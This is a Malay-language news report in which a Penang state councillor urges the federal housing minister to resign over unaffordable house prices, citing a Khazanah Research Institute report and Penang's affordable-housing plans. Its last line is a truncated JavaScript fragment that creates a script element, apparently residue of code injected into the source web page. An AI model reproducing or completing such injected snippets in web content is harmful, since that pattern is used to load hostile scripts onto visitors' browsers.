Gagal kawal harga rumah, Exco desak Menteri letak jawatan

GEORGE TOWN – Exco Perancangan Bandar & Desa dan Perumahan, Jagdeep Singh Deo mendesak supaya Menteri Kesejahteraan Bandar, Perumahan dan Kerajaan Tempatan, Datuk Abdul Rahman Dahlan mengambil tanggungjawab sepenuhnya dengan meletak jawatan kerana gagal mengawal harga rumah negara ini.

Menurutnya, laporan terkini daripada Institut Penyelidikan Khazanah (Khazanah Research Institute, KRI) iaitu “Making Housing Affordable”, adalah amat mengejutkan.

“Laporan tersebut menyatakan bahawa harga pasaran hartanah perumahan di Malaysia adalah langsung tidak mampu dimiliki (seriously unaffordable) dengan kadar harga rumah 4.4 kali lebih tinggi dari kadar pendapatan isi rumah.

“Kerajaan Pusat perlu segera mengambil langkah-langkah wajar bagi menangani kenaikan harga rumah di Malaysia dan Menteri berwajib seharusnya meletak jawatan kerana gagal mengawalnya,” tegasnya pada majlis sidang media di sini baru-baru ini.

Turut serta, Exco Pertanian & Industri Asas Tani, Pembangunan Desa dan Kesihatan, Dr. Afif Bahardin.

Menurut Jagdeep, sebagai sebuah kerajaan, keuntungan seharusnya tidak diutamakan, sebaliknya perlu mengutamakan perbekalan unit-unit perumahan yang mampu dimiliki rakyat.

“Maka, Kerajaan Pusat sepatutnya mengetepikan keuntungan hampir RM150 juta yang dikaut melalui 15 projek di bawah agensi-agensi Persekutuan dengan membina rumah yang benar-benar mampu dimiliki oleh rakyat termasuk warga Pulau Pinang,” ujarnya.

Mengulas lanjut, Jagdeep memberitahu, Kerajaan Negeri Pulau Pinang telahpun mengambil inisiatif untuk membekalkan rumah kepada seluruh warga Pulau Pinang mengikut ketetapan harga yang mampu dimiliki.

“Sudah tentulah harga yang dicadangkan agensi Persekutuan mencecah hampir RM2 juta (di bahagian pulau) dan RM1 juta di bahagian Seberang Perai adalah harga yang sememangnya tidak mampu dimiliki, sekaligus menyumbang kepada rumusan laporan KRI bahawa harga rumah di Malaysia adalah langsung tidak mampu dimiliki.

“Kerajaan Pusat perlu dengan sertamerta mengarahkan agensi Persekutuan terlibat seperti JKP Sdn. Bhd. dan PERDA untuk menyemak semula harga jualan unit perumahannya kepada harga mampu milik iaitu antara RM200,000 hingga RM400,000 di bahagian pulau dan RM150,000 ke RM250,000 bagi bahagian Seberang Perai.

“Malah untuk rekod, ada projek-projek JKP Sdn. Bhd. yang telahpun diluluskan permohonan kebenaran merancangnya,” jelasnya yang berharap agar lebih banyak pihak swasta turut membantu inisiatif Kerajaan Negeri untuk membekalkan perumahan mampu milik di Pulau Pinang mengikut Garis Panduan Perumahan Mampu Milik 100 peratus.

Tambah Jagdeep, sehingga kini, Kerajaan Negeri melalui Perbadanan Pembangunan Pulau Pinang (PDC) komited untuk membina 22,512 unit rumah kos rendah, kos sederhana rendah dan mampu milik dalam tempoh lima hingga 10 tahun akan datang.

“Pihak swasta juga telah memohon untuk membina sebanyak 12,606 unit perumahan mampu milik yang kini dikemukakan kepada pihak berkuasa tempatan untuk prosedur berikutnya,” kata beliau.

Sementara itu, Jagdeep turut berharap agar Kerajaan Pusat dapat memberi layanan saksama kepada pemaju-pemaju di Pulau Pinang yang telahpun memohon Permit Pengiklanan dan Lesen Pemaju (Advertising Permit & Developer’s License, APDL) untuk kelulusan.

“Harus diingati bahawa penafian kelulusan permohonan APDL secara langsung bermaksud penafian pemajuan projek-projek perumahan mampu milik di Pulau Pinang.

“Saya berharap Kerajaan Pusat berhenti memainkan politik dalam usaha perbekalan perumahan mampu milik kepada warga Pulau Pinang,” tegas beliau lagi.

var d=document;var s=d.createElement(‘script’);